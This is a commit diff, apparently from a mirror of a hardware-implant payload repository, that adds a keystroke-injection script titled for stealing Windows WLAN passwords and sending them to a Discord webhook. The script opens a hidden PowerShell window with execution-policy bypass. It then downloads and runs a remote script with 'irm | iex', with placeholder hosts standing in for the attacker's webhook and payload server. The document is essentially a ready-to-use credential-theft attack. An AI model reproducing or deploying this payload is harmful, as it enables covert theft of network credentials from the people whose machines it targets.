mirror of https://github.com/hak5/omg-payloads.git
WLAN-Windows-Passwords-Discord-Exfiltration
parent
716a6bd80b
commit
aaf34c1130
|
@ -0,0 +1,25 @@
|
||||||
|
REM ###################################################################
|
||||||
|
REM # |
|
||||||
|
REM # Title : WLAN-Windows-Passwords-Discord-Exfiltration |
|
||||||
|
REM # Author : Aleff |
|
||||||
|
REM # Description: A script used to stole target WLAN Passwords. |
|
||||||
|
REM # Category : Credentials |
|
||||||
|
REM # Target : Windows 10-11 |
|
||||||
|
REM # Version : 1.0 |
|
||||||
|
REM # |
|
||||||
|
REM ###################################################################
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
GUI r
|
||||||
|
DELAY 250
|
||||||
|
STRING powershell -w h -ep bypass $discord='
|
||||||
|
|
||||||
|
REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
|
||||||
|
DEFINE DISCORD example.com
|
||||||
|
STRING DISCORD
|
||||||
|
|
||||||
|
REM Reply example.com with YOUR LINK. The Payload should be Windows-Passwords.ps1
|
||||||
|
DEFINE PAYLOAD example.com
|
||||||
|
STRINGLN ';irm PAYLOAD | iex
|
Loading…
Reference in New Issue